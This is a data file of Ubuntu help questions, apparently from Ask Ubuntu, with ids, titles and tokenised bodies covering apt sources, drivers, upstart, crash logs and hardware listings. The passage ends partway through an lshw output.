185268	permission denied : /etc/apt/sources.list	i 'm trying to install java jre , i usually do it like this sudo echo 'deb http : //www.duinsoft.nl/pkg debs all ' > > /etc/apt/sources.list sudo apt-key adv -- keyserver keys.gnupg.net -- recv-keys 5cb26b26 sudo apt-get update sudo apt-get install update-sun-jre exit but when i do sudo echo 'deb http : //www.duinsoft.nl/pkg debs all ' > > /etc/apt/sources.list i see permission denied : /etc/apt/sources.list when i do ls -l /etc/apt/sources.list i see -rw-r -- r -- 1 root root 3360 aug 26 01:45 /etc/apt/sources.list when i do sudo mv /etc/apt/sources.list /etc/apt/sources.list.old sudo cat /etc/apt/sources.list.old | sudo tee /etc/apt/sources.list i see # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / dists/precise/main/binary-i386/ # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / dists/precise/restricted/binary-i386/ # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / precise main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //lb.archive.ubuntu.com/ubuntu/ precise main restricted deb-src http : //lb.archive.ubuntu.com/ubuntu/ precise main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //lb.archive.ubuntu.com/ubuntu/ precise-updates main restricted deb-src http : //lb.archive.ubuntu.com/ubuntu/ precise-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //lb.archive.ubuntu.com/ubuntu/ precise universe deb-src http : //lb.archive.ubuntu.com/ubuntu/ precise universe deb http : //lb.archive.ubuntu.com/ubuntu/ precise-updates universe deb-src http : //lb.archive.ubuntu.com/ubuntu/ precise-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //lb.archive.ubuntu.com/ubuntu/ precise multiverse deb-src http : //lb.archive.ubuntu.com/ubuntu/ precise multiverse deb http : //lb.archive.ubuntu.com/ubuntu/ precise-updates multiverse deb-src http : //lb.archive.ubuntu.com/ubuntu/ precise-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //lb.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb-src http : //lb.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu precise-security main restricted deb-src http : //security.ubuntu.com/ubuntu precise-security main restricted deb http : //security.ubuntu.com/ubuntu precise-security universe deb-src http : //security.ubuntu.com/ubuntu precise-security universe deb http : //security.ubuntu.com/ubuntu precise-security multiverse deb-src http : //security.ubuntu.com/ubuntu precise-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu precise partner # deb-src http : //archive.canonical.com/ubuntu precise partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu precise main deb-src http : //extras.ubuntu.com/ubuntu precise main and the issue is not solved , i still see that permission error , i 'm on a 64 bit laptop
185274	how can i disable usb-autosuspend for a specific device ?	this is related to the issue discussed in this question . summary : the mouse freezes when operating on battery since it is autosuspended after a certain time and needs more time to wake up . disabling usb-autosuspend for the mouse 's receiver in powertop is a temporary solution but does not survive a reboot . how can i permanently disable the usb autosuspend for only one specific device ? a solution that does not involve installing additional packages is preferred ( after all , i want to disable something ) but not required . removing powertop ( which seems to be a solution for some ) is not what i want - i like poertop ... and installing laptop-mode-tools to disable usb_autosuspend alltogether is not what i want , either , thus the new question . also : will this affect the battery of my notebook ? the logitech unifying receiver for the mouse stays connected all the time , so if that prevents the autosuspend from happening for all devices that would probably be bad .
185284	how to get rid of the background gradient of the inline gtktoolbar ?	when you run the below code , it will show an inline toolbar in a window . notice how the inline toolbar has a stand-out backbround . is there a way to apply css to get rid of it and make blend with regular window color ? # ! /usr/bin/python3 from gi.repository import gtk button_names = [ gtk.stock_about , gtk.stock_add , gtk.stock_remove , gtk.stock_quit ] buttons = [ gtk.toolbutton.new_from_stock ( name ) for name in button_names ] toolbar = gtk.toolbar ( ) toolbar.set_show_arrow ( false ) for button in buttons : toolbar.insert ( button , -1 ) style_context = toolbar.get_style_context ( ) style_context.add_class ( gtk.style_class_inline_toolbar ) grid = gtk.grid ( ) grid.add ( toolbar ) label = gtk.label ( ) grid.add ( label ) window = gtk.window ( ) window.set_size_request ( 200 , 50 ) window.add ( grid ) window.connect ( 'delete-event ' , gtk.main_quit ) window.show_all ( ) gtk.main ( ) using andrewsomething code , it 's starting to look better but the `` border '' is still there and takes up space . notice in the below screenshot the toolbar on the left is smaller than the regular buttons on the right :
185285	zooming in ubuntu 12.04	i love the goals of ubuntu , and have tried it and other distros based on it several times over the last five years . it 's amazing how far the desktop environment has come and how easy it is to set up , but i am still extremely disappointed in the accessibility for people who are visually impaired . orca is a joke . the magnifier would n't be good even if it were stable . i found vinux the other day , and found that they had another solution that involves compiz . they have a button to activate compiz and then all you have to do is press super+left click to zoom in . it works great . but i 'm having other hardware and network problems . can you help me get similar functionality in ubuntu ? i know nothing about how to get to anything or do anything in the new version . i can follow instructions and navigate the system using the terminal .
185290	sharing an encrypted home directory between ubuntu installs	i am trying to `` share '' a home directory between two separate ubuntu installations . on my hdd i have an ubuntu 11.04 installation with a separate /home partition that uses encryption . my data currently lives there . i just got a new ssd and installed ubuntu 12.04 on it . what i 'm trying to do is use the ubuntu 12.04 install as the system drive , but store all my data on the ubuntu 11.04 /home partition . in the new 12.04 install , i did include a /home folder for storing system configuration and programs , but i would like to be able to mount the /home partition from the 11.04 install to store all my data . i am able to mount the encrypted /home partition from 11.04 but it is n't a very seamless process , as you need to be root to edit access it once it 's mounted in /media . is there any way to mount/automount and `` login '' to the /home data partition and basically use the partition seamlessly in the 12.04 install ?
185293	how to configure a minimal ubuntu installation ?	i recently re installed ubuntu using the mini.iso , but much to my dismay the mini.iso is not configured the same way as the ubuntu desktop iso some `` problems '' i 'm facing such as : an installation using the regular ubuntu cd recognizes my active network connections in network manager , installing with the mini.iso gives me a working connection however no connections are `` active '' in network manager displaying the message `` the system network services are not compatible with this version . '' in a regular ubuntu install connecting an android phone to the pc mounts the phone 's internal memory and sd card if present , using the mini.iso the phone is detected as it appears with the command lsusb but it 's not mounted and ca n't be mounted . in the same regards using the phone to tether it 's connection to the pc via usb , the phone is connected to my ( wifi ) . in the regular ubuntu install the phone is recognized as a networking device and is used as connection usb0 , while in the mini.iso nothing happens , and trying to add the connection to /etc/network/interfaces results in the os crashing . just to make sure it was n't a matter of my user not having the correct permissions or a lack of `` groups '' , i 've checked with an ubuntu vm and the groups are the same , the networking files are the same , and the packages ( except those of ubuntu-desktop such as unity , firefox , libreoffice , and other non-essential software ) are installed in my pc , so what else is there to look for ? . i 'm sure i 'm missing something , and i 'd prefer not to install ubuntu again , using the regular cd . how can i manage to get the same behaviour/configuration without reinstalling ? contents of : /var/lib/dpkg/status dpkg -- list ps aux
185294	how do tab groups work in ubuntu firefox	in ubuntu firefox , when i open a new tab , it does not appear in the bar at the top next to the existing tabs . then i ca n't figure out how to switch between the hidden tab and the visible tabs . i must be missing something trivial , but i have no clue how to switch tabs .
185295	delta-update firefox aurora package from ppa	i am using firefox aurora in my ubuntu 12.04 which i have installed via its ppa ( ppa : ubuntu-mozilla-daily/firefox-aurora ) . as expected of aurora , i get an update usually after 2-3 days . i have firefox aurora installed in windows too . there also i get updates in 2-3 days but size of update is usually 4-5 mb , while in ubuntu it 's always around 20 mb . what is the reason for this difference ? is there any way by which i can download and install only the changes and not the entire aurora again and again ?
185296	cairo dock : white outline on selected icons ?	i installed cairo dock and it 's working fine , but i 'm seeing a white outline on selected icons . i 've searched , but can not find the file ( s ) associated with this outline . any ideas ? thanks !
185297	install wubi on slow windows pc	i tried installing wubi on a very slow computer running windows xp . i thought that maybe it would get some extra life out of the computer , but it was so slow that i removed the wubi and gave up . if i make a partition and install a regular version of ubuntu to that partition will this give me the result i 'm looking for , or is a slow computer just a slow computer ! i 'm sure it is obvious , but i 'm new to linux and not exactly a computer export .
185299	start command does n't return for upstart script in ubuntu ?	i have written an upstart script called 'ts.conf ' for a daemon and put it in /etc/init . when i try to start it with start ts i expect a confirmation message and i also expect to get the prompt back , but the terminal hangs . when i hit ctrl-c i get the prompt back . if i start again a message says start : job is already running : ts the server is , however , not running , and i can find the mono process using 'ps -ef ' . the script 'ts.conf ' is located in /etc/init and looks like this : start on runlevel [ 2345 ] stop on runlevel [ 016 ] respawn expect fork script cd /home/ubuntu/terraria /usr/bin/mono /home/ubuntu/terraria/terrariaserver.exe -worldpath /home/ubuntu/terraria -world world1.wld end script the server starts fine if i run the command manually from the command prompt . can anybody see what is wrong with my upstart script , or understand why nothing seems to happen ? please not that the text above is wrong when it says that i can find the process with ps -ef . i can not find the process using ps .
185300	decoder for .ram file	i have a .ram file which i would very much like to open and i have already installed parole 0.2.0.6 on this behalf . if i open the file with parole now it tells me that an `` text/uri-list-decoder '' is still missing and needs to be installed . where do i get this decoder and how do i install it ? or is there any other mediaplayer which can cope better ? system is ubuntu 12.04 lts .
185304	firefox starts in small window	ever since the installation of 12.4 , firefox only starts in a small window . i 'm getting really pissed about that . does anyone know how to fix that ? any kind of help would be really appreciated ! ! !
185306	why does dpkg install the vagrant deb into `` /opt '' ?	i am installing vagrant manually with the deb . i did sudo dpkg -i vagrant ... ..deb and i found it 's in /opt/ . basically it does n't add to the bash profile like apt-get does . is that supposed to happen with dpkg ? thanks
185307	how to restore empty `/etc/initramfs-tools/modules` file ?	i was trying to fix plymouth using a script i found , the /etc/initramfs-tools/modules file is now empty ! so i do n't know what this can means for my system . can anyone help me restoring it ?
185309	is there a public beta for steam for linux ?	its hard to follow up with all the news since all the websites say their own thing . i 'm wondering is there is a beta or at least an alpha for steam for linux . i saw on youtube how someone starts 2.2 beta , but it seems all the download links are broken . can someone explain the situation please ? is it because valve just does n't want anyone using the program yet ?
185311	thunderbird crashed when started	thunderbird crashed when i started the program in my ubuntu 12.04 64 bits . i have over 40 gb in e-mails that i can not access . i 'm very disappointed . please help me .
185315	picking up radio station when connecting monitor on latop	i have a laptop asus g73jw rog-a3b7m intel core i7 || 16gb ram || 802.11n+bt || 2 x 500gb hybrid drives || nvidia gtx 460m and i am picking up some staticy radio station when connecting my monitor over rgb connector . my radio system is connected via my laptops headphone jack . if i disconnect my extra monitor the radio station static disappears . i am not sure what this is related to or even how to debug such an issue . any help is appreciated . the monitor is a acer p216hl and the stero is a teac nxt
185317	are security.ubuntu.com updates eventually merged into normal updates ?	upon my observation , seems new packages will first appear in security.ubuntu.com , but if you upgrade later , they will appear in xx.archive.ubuntu.com ( depends on your config ) , was that true ?
185320	i installed ubuntu onto an external usb drive , can it be used on multiple computers ?	i installed the 12.04 iso with unetbootin to a flash drive then booted into the liveusb and installed onto an external hard disks . works flawlessly so far . my question is ; am i able to boot to it from any other computer and use as usual without problems ? or will there be missing drivers and/or any other problems ? thanks in advance .
185321	chrome infected	i have chrome browser installed and sometime in the last week it starts randomly open popup windows as i clicked in different sites . i suspect i 'd been infected by some trojan . i 've scanned my machine with clamav and found nothing . can someone tell me how to troubleshoot this problem ?
185322	what other things can i use my dumb terminal for ?	i have a serial dumb terminal . i use a null modem via a serial port to connect it to my ubuntu computer . it comes in handy when x freezes and the there is no response using the keyboard . if i can boot from my dumb terminal i can fix my system . what other things can i use my dumb terminal for ? here is a link you can read about a dumb terminal . http : //en.wikipedia.org/wiki/computer_terminal
185326	installing broadcom drivers on ubuntu 12.04	i downloaded ubuntu 12.04 so that i could dual boot between ubuntu and vista . i am currently using a broadcom 802.11.n network adapter for internet , i do n't have access to an ethernet connection . is there a way for me to install the broadcom drivers for ubuntu while running vista , then just install the drivers on ubuntu from my vista files . or put the drivers on a usb and install from there . there is no way for me to get an internet connection on ubuntu without the broadcam drivers .
185328	12.04 : persistent gimp 2.2 from gimphoto or gimpshop . can not install 2.8	i have a very messed up installation of gimp . some time ago i installed gimpshop or gimphoto ( ca n't really remember which ) and it installed gimp 2.2 . did n't work for me and tried to remove it . i 've followed all gimp remove , autoremove , clean , update and upgrade instructions i 've found here to no avail . now software center does n't even show 2.8 but instead it does 2.6 . i 've installed and removed gimp from terminal nth times . running gimp from the dash does n't do anything but entering `` gimp '' in the terminal prompt gives me a 2.2 installation screen . can not for the life of me find and remove the darn leftover garbage . how can i completely clean my system ( 12.04 , fully updated today ) from everything gimp so i can give 2.8 a try ? anticipated apologies if this is a dupe but i 've run through all messages with a gimp tag and none has helped me . sudo apt-get install -f gives me 0,0,0,0 . thanks in advance .
185333	did something just get broked with glibc/perl/irssi ?	i was using irssi about 30 minutes ago now on ubuntu server 12.04 . everything was perfectly fine and then all of the sudden something happened ( my guess is a power failure ) . the box was restarted . when i logged back in and ran irssi , i got the following : *** glibc detected *** irssi : double free or corruption ( out ) : 0x0000000002085a40 *** ======= backtrace : ========= /lib/x86_64-linux-gnu/libc.so.6 ( +0x7e626 ) [ 0x7ffc01d87626 ] irssi ( config_node_set_str+0x98 ) [ 0x491768 ] irssi [ 0x491f12 ] irssi [ 0x491e61 ] irssi ( config_parse+0x52 ) [ 0x492112 ] irssi [ 0x48ab81 ] irssi ( settings_init+0xd1 ) [ 0x48bf81 ] irssi ( core_init+0x79 ) [ 0x47a849 ] irssi ( main+0xd8 ) [ 0x4167e8 ] /lib/x86_64-linux-gnu/libc.so.6 ( __libc_start_main+0xed ) [ 0x7ffc01d2a76d ] irssi [ 0x416b41 ] ======= memory map : ======== 00400000-004d0000 r-xp 00000000 08:01 1319015 /usr/bin/irssi 006cf000-006d0000 r -- p 000cf000 08:01 1319015 /usr/bin/irssi 006d0000-006dc000 rw-p 000d0000 08:01 1319015 /usr/bin/irssi 006dc000-006dd000 rw-p 00000000 00:00 0 02078000-02099000 rw-p 00000000 00:00 0 [ heap ] 7ffc0025b000-7ffc00270000 r-xp 00000000 08:01 655404 /lib/x86_64-linux-gnu/libgcc_s.so.1 7ffc00270000-7ffc0046f000 -- -p 00015000 08:01 655404 /lib/x86_64-linux-gnu/libgcc_s.so.1 7ffc0046f000-7ffc00470000 r -- p 00014000 08:01 655404 /lib/x86_64-linux-gnu/libgcc_s.so.1 7ffc00470000-7ffc00471000 rw-p 00015000 08:01 655404 /lib/x86_64-linux-gnu/libgcc_s.so.1 7ffc00471000-7ffc0073a000 r -- p 00000000 08:01 1320172 /usr/lib/locale/locale-archive 7ffc0073a000-7ffc00746000 r-xp 00000000 08:01 655391 /lib/x86_64-linux-gnu/libnss_files-2.15.so 7ffc00746000-7ffc00945000 -- -p 0000c000 08:01 655391 /lib/x86_64-linux-gnu/libnss_files-2.15.so 7ffc00945000-7ffc00946000 r -- p 0000b000 08:01 655391 /lib/x86_64-linux-gnu/libnss_files-2.15.so 7ffc00946000-7ffc00947000 rw-p 0000c000 08:01 655391 /lib/x86_64-linux-gnu/libnss_files-2.15.so 7ffc00947000-7ffc00951000 r-xp 00000000 08:01 655392 /lib/x86_64-linux-gnu/libnss_nis-2.15.so 7ffc00951000-7ffc00b51000 -- -p 0000a000 08:01 655392 /lib/x86_64-linux-gnu/libnss_nis-2.15.so followed by many more lines . is there anything i can do to fix this ?
185335	e : malformed line 56 in source list /etc/apt/sources.list	i do n't know what happened , but one day my computer had some sort of a system error and could no longer update itself . the software center will not open , it will begin to initialize and then a message pops up saying theres a system error and needs to shut down the software center . then another box pops up after i go to report it saying it was unable to identify source or package name . i also ca n't extract a zipped folder to anything , or reinstall ubuntu from a usb boot drive anymore , it keeps telling me my my computer is n't compatible when i know for a fact it is , because thats how i got ubuntu on here in the first place . the only thing i know about this error is that a message popped up after i went to check for updates saying to report the problem and include this message in the report : e : malformed line 56 in source list /etc/apt/sources.list ( dist parse ) bash : /etc/apt/sources.list : permission denied < -- this is the message that pops up when i attempt to access this line . . . it also called it a bug . i just want to know how to either get rid of the bug completely or find some way to be able to reinstall ubuntu again . i know it 's not a lot of information , but it 's all i can give . sorry .
185337	dual monitor with two different window managers	i have dual monitors . i have had different window managers on each monitor before . like gnome in one and kde in the other . it was a nice way to show off linux . i would like to do this again but i ca n't remember how i did it . how do i do this ?
185338	installing nvidia drivers in 12.04	1 > i have been fed up trying to install nvidia graphic drivers . after the installation ubuntu starts looking ugly , the taskbar or the sidebar doesnt remain the same as before . the window close button or minimize button disappears . 2 > which packages should should i install to make my desktop look the best ? like gnome2 or cinnamon . 3 > if anyone out there have a good knowledge of ubuntu please share what things should i install after installation of ubuntu . thanks in advance
185341	ca n't change brightness on a macbook 5,1	i 'm a total newbie to ubuntu and recently decided to give it a go on my early 2009 alu macbook . for about a week now i 've been trying to get the brightness controls to work . i 've tried the following : brightness controls does n't work on a macbook pro 5.5 ( ubuntu 12.04 lts ) https : //help.ubuntu.com/community/macbookpro5-5/precise # lcd none of it seems to work . next option was to try the nvidia-bl-dkms drivers , but aftert installing the mactel ppa i just get this : reading package lists ... donebuilding dependency tree reading state information ... done e : unable to locate package nvidia-bl-dkms any help would be much appreciated as my eyes are going to fall out soon with the brightness maxed out .
185347	phpmyadmin : drop database statements disabled	i just upgraded from 10.04 to 12.04 . now , when i try to drop a database in phpmyadmin it gives me an error saying that drop database statements are disabled . after reading up on this i added this line , $ cfg [ 'allowuserdropdatabase ' ] = true ; to the bottom of /etc/phpmyadmin/config.inc.php , but i still get the same message . i logged out of phpmyadmin , rebooted and logged back in , but still no change . any ideas ? update : ok , i have discovered a few more details : i can drop a database from phpmyadmin by clicking on the drop link . i can not , however , drop by typing the sql directly . i can drop a database from the command prompt , no problems there is one particular database that seems to be screwed up . if i try to drop from the command prompt , it says it has lost connection to the server . if i try from within phpmyadmin , it errors out and logs me out instantly .
185354	directory permissions adding user in a group	i added a user using useradd useradd -g upperdevs myuser but when i do an id check i did n't see the upperdevs group . id myuser # uid=1000 ( myuser ) gid=1000 ( myuser ) groups=1000 ( myuser ) ,27 ( sudo ) probably this was the issue why i ca n't write to certain_dir , by doing ls -l : drwxrwxr-x 2 root upperdevs 4096 sep 8 13:35 certain_dir anything i 'm doing wrong ?
185355	streaming video does not play smoothly . cpu struggling with simple tasks	i have a desktop made in 2004 . it has a 3.0 ghz processor with 2 gb ddr2 533 mhz dual channel and a radeon 4670 pci-e card w/ 1 gb ddr3 ram . it has a wd caviar blk 640 gb hd w/ 32 mb cache . i have it dual-booted w/ windows xp sp3 and ubuntu 12.04 with xfce and xmbc packages also installed . while ubuntu is running , processor is sometimes at about 94 % even while running only firefox or software center . while running firefox , images sometimes load slowly and video steaming stutters and audio is out of sync . also thumbnails in my picture files load a lot slower than on xp . xfce is a bit smoother with video but still struggles with full screen . i should mention that my internet speed is about 3mbps , however xp somehow is faster . i have always heard that linux runs well on older systems but i am wondering how i can improve performance .
185358	why ca n't i use unity 3d on a ati mobility radeon hd 4200 series with fglrx drivers ?	with a brand new install of 12.04 on my dell inspiron m5030 , unity 3d appears to load everything but the icons in the top left , and i am unable to click on anything . unity 2d seems to works fine however . i have done nothing except install synaptic package manager and follow this guide to install fglrx drivers under settings â additional drivers , the driver shows as installed and functioning . also after running : /usr/lib/nux/unity_support_test -p , i get this : opengl vendor string : ati technologies inc. opengl renderer string : ati mobility radeon hd 4200 series opengl version string : 3.3.11653 compatibility profile context not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes i am unsure as to what the problem is . i have tried the non-proprietary drivers , i could not get them to work either , but i would be willing to try again .
185361	how do i mount my sd card ? i am using ubuntu 10.04	root @ shobhit : /media # lsusb bus 002 device 017 : id 14cd:125c super top bus 002 device 003 : id 0c45:6421 microdia bus 002 device 002 : id 8087:0020 bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 011 : id 413c:8160 dell computer corp . bus 001 device 006 : id 413c:8162 dell computer corp . bus 001 device 005 : id 413c:8161 dell computer corp . bus 001 device 004 : id 138a:0008 digitalpersona , inc bus 001 device 003 : id 0a5c:4500 broadcom corp. bcm2046b1 usb 2.0 hub ( part of bcm2046 bluetooth ) bus 001 device 002 : id 8087:0020 bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub root @ shobhit : /home/shobhit/scripts/internalutilities # sudo lspci -v -nn 00:1a.0 usb controller [ 0c03 ] : intel corporation 5 series/3400 series chipset usb2 enhanced host controller [ 8086:3b3c ] ( rev 06 ) ( prog-if 20 ) subsystem : dell device [ 1028:0441 ] flags : bus master , medium devsel , latency 0 , irq 16 memory at fbc08000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : [ 50 ] power management version 2 capabilities : [ 58 ] debug port : bar=1 offset=00a0 capabilities : [ 98 ] pcie advanced features < ? > kernel driver in use : ehci_hcd 00:1d.0 usb controller [ 0c03 ] : intel corporation 5 series/3400 series chipset usb2 enhanced host controller [ 8086:3b34 ] ( rev 06 ) ( prog-if 20 ) subsystem : dell device [ 1028:0441 ] flags : bus master , medium devsel , latency 0 , irq 23 memory at fbc07000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : [ 50 ] power management version 2 capabilities : [ 58 ] debug port : bar=1 offset=00a0 capabilities : [ 98 ] pcie advanced features < ? > kernel driver in use : ehci_hcd 00:1e.0 pci bridge [ 0604 ] : intel corporation 82801 mobile pci bridge [ 8086:2448 ] ( rev a6 ) ( prog-if 01 ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=20 , subordinate=20 , sec-latency=32 capabilities : [ 50 ] subsystem : dell device [ 1028:0441 ] 00:1f.0 isa bridge [ 0601 ] : intel corporation mobile 5 series chipset lpc interface controller [ 8086:3b0b ] ( rev 06 ) subsystem : dell device [ 1028:0441 ] flags : bus master , medium devsel , latency 0 capabilities : [ e0 ] vendor specific information < ? > kernel modules : itco_wdt 00:1f.2 sata controller [ 0106 ] : intel corporation 5 series/3400 series chipset 6 port sata ahci controller [ 8086:3b2f ] ( rev 06 ) ( prog-if 01 ) subsystem : dell device [ 1028:0441 ] flags : bus master , 66mhz , medium devsel , latency 0 , irq 29 i/o ports at f070 [ size=8 ] i/o ports at f060 [ size=4 ] i/o ports at f050 [ size=8 ] i/o ports at f040 [ size=4 ] i/o ports at f020 [ size=32 ] memory at fbc06000 ( 32-bit , non-prefetchable ) [ size=2k ] capabilities : [ 80 ] message signalled interrupts : mask- 64bit- queue=0/0 enable+ capabilities : [ 70 ] power management version 3 capabilities : [ a8 ] sata hba < ? > capabilities : [ b0 ] pcie advanced features < ? > kernel driver in use : ahci kernel modules : ahci 00:1f.3 smbus [ 0c05 ] : intel corporation 5 series/3400 series chipset smbus controller [ 8086:3b30 ] ( rev 06 ) subsystem : dell device [ 1028:0441 ] flags : medium devsel , irq 3 memory at fbc05000 ( 64-bit , non-prefetchable ) [ size=256 ] i/o ports at f000 [ size=32 ] kernel modules : i2c-i801 00:1f.6 signal processing controller [ 1180 ] : intel corporation 5 series/3400 series chipset thermal subsystem [ 8086:3b32 ] ( rev 06 ) subsystem : dell device [ 1028:0441 ] flags : bus master , fast devsel , latency 0 , irq 3 memory at fbc04000 ( 64-bit , non-prefetchable ) [ size=4k ] capabilities : [ 50 ] power management version 3 capabilities : [ 80 ] message signalled interrupts : mask- 64bit- queue=0/0 enable- 12:00.0 network controller [ 0280 ] : broadcom corporation device [ 14e4:4727 ] ( rev 01 ) subsystem : dell device [ 1028:0010 ] flags : bus master , fast devsel , latency 0 , irq 17 memory at fbb00000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : [ 40 ] power management version 3 capabilities : [ 58 ] vendor specific information < ? > capabilities : [ 48 ] message signalled interrupts : mask- 64bit+ queue=0/0 enable- capabilities : [ d0 ] express endpoint , msi 00 capabilities : [ 100 ] advanced error reporting < ? > capabilities : [ 13c ] virtual channel < ? > capabilities : [ 160 ] device serial number cb-c0-8b-ff-ff-38-00-00 capabilities : [ 16c ] power budgeting < ? > kernel driver in use : wl kernel modules : wl 13:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 03 ) subsystem : dell device [ 1028:0441 ] flags : bus master , fast devsel , latency 0 , irq 28 i/o ports at e000 [ size=256 ] memory at d0b04000 ( 64-bit , prefetchable ) [ size=4k ] memory at d0b00000 ( 64-bit , prefetchable ) [ size=16k ] expansion rom at fba00000 [ disabled ] [ size=128k ] capabilities : [ 40 ] power management version 3 capabilities : [ 50 ] message signalled interrupts : mask- 64bit+ queue=0/0 enable+ capabilities : [ 70 ] express endpoint , msi 01 capabilities : [ ac ] msi-x : enable- mask- tabsize=4 capabilities : [ cc ] vital product data < ? > capabilities : [ 100 ] advanced error reporting < ? > capabilities : [ 140 ] virtual channel < ? > capabilities : [ 160 ] device serial number 00-e0-4c-68-00-00-00-03 kernel driver in use : r8169 kernel modules : r8169 root @ shobhit : /home/shobhit/scripts/internalutilities # sudo lshw shobhit description : portable computer product : vostro 3500 vendor : dell inc. version : a10 serial : fv1l3n1 width : 32 bits capabilities : smbios-2.6 dmi-2.6 smp-1.4 smp configuration : boot=normal chassis=portable cpus=2 uuid=44454c4c-5600-1031-804c-c6c04f334e31 *-core description : motherboard product : 0g2r51 vendor : dell inc. physical id : 0 version : a10 serial : .fv1l3n1.cn7016612h00pw . slot : to be filled by o.e.m . *-cpu:0 description : cpu product : intel ( r ) core ( tm ) i5 cpu m 480 @ 2.67ghz vendor : intel corp. physical id : 4 bus info : cpu @ 0 version : 6.5.5 serial : 0002-0655-0000-0000-0000-0000 slot : cpu 1 size : 1197mhz capacity : 2926mhz width : 64 bits clock : 533mhz capabilities : boot fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx rdtscp x86-64 constant_tsc arch_perfmon pebs bts xtopology nonstop_tsc aperfmperf pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm sse4_1 sse4_2 popcnt lahf_lm ida arat tpr_shadow vnmi flexpriority ept vpid cpufreq configuration : id=4 *-cache:0 description : l1 cache physical id : 5 slot : l1-cache size : 64kib capacity : 64kib capabilities : internal write-back unified *-cache:1 description : l2 cache physical id : 6 slot : l2-cache size : 512kib capacity : 512kib capabilities : internal varies unified *-cache:2 description : l3 cache physical id : 7 slot : l3-cache size : 3mib capacity : 3mib capabilities : internal varies unified *-logicalcpu:0 description : logical cpu physical id : 4.1 width : 64 bits capabilities : logical *-logicalcpu:1 description : logical cpu physical id : 4.2 width : 64 bits capabilities : logical *-logicalcpu:2 description : logical cpu physical id : 4.3 width : 64 bits capabilities : logical *-logicalcpu:3 description : logical cpu physical id : 4.4 width : 64 bits capabilities : logical *-logicalcpu:4 description : logical cpu physical id : 4.5 width : 64 bits capabilities : logical *-logicalcpu:5 description : logical cpu physical id : 4.6 width : 64 bits capabilities : logical *-logicalcpu:6 description : logical cpu physical id : 4.7 width : 64 bits capabilities : logical *-logicalcpu:7 description : logical cpu physical id : 4.8 width : 64 bits capabilities : logical *-logicalcpu:8 description : logical cpu physical id : 4.9 width : 64 bits capabilities : logical *-logicalcpu:9 description : logical cpu physical id : 4.a width : 64 bits capabilities : logical *-logicalcpu:10 description : logical cpu physical id : 4.b width : 64 bits capabilities : logical *-logicalcpu:11 description : logical cpu physical id : 4.c width : 64 bits capabilities : logical *-logicalcpu:12 description : logical cpu physical id : 4.d width : 64 bits capabilities : logical *-logicalcpu:13 description : logical cpu physical id : 4.e width : 64 bits capabilities : logical *-logicalcpu:14 description : logical cpu physical id : 4.f width : 64 bits capabilities : logical *-logicalcpu:15 description : logical cpu physical id : 4.10 width : 64 bits capabilities : logical *-memory description : system memory physical id : 1d slot : system board or motherboard size : 3gib *-bank:0 description : dimm synchronous 1333 mhz ( 0.8 ns ) product : hmt112s6tfr8c-h9 vendor : ad80 physical id : 0 serial : 5525c935 slot : dimm_a size : 1gib width : 64 bits clock : 1333mhz ( 0.8ns ) *-bank:1 description : dimm synchronous 1333 mhz ( 0.8 ns ) product : hmt125s6tfr8c-h9 vendor : ad80 physical id : 1 serial : 3441d6ca slot : dimm_b size : 2gib width : 64 bits clock : 1333mhz ( 0.8ns ) *-firmware description : bios vendor : dell inc. physical id : 0 version : a10 ( 10/25/2010 ) size : 64kib capacity : 1984kib capabilities : mca pci upgrade shadowing escd cdboot bootselect socketedrom edd int13floppy1200 int13floppy720 int13floppy2880 int5printscreen int9keyboard int14serial int17printer int10video acpi usb zipboot biosbootspecification *-cpu:1 physical id : 1 bus info : cpu @ 1 version : 6.5.5 serial : 0002-0655-0000-0000-0000-0000 size : 1197mhz capacity : 1197mhz capabilities : vmx ht cpufreq configuration : id=4 *-logicalcpu:0 description : logical cpu physical id : 4.1 capabilities : logical *-logicalcpu:1 description : logical cpu physical id : 4.2 capabilities : logical *-logicalcpu:2 description : logical cpu physical id : 4.3 capabilities : logical *-logicalcpu:3 description : logical cpu physical id : 4.4 capabilities : logical *-logicalcpu:4 description : logical cpu physical id : 4.5 capabilities : logical *-logicalcpu:5 description : logical cpu physical id : 4.6 capabilities : logical *-logicalcpu:6 description : logical cpu physical id : 4.7 capabilities : logical *-logicalcpu:7 description : logical cpu physical id : 4.8 capabilities : logical 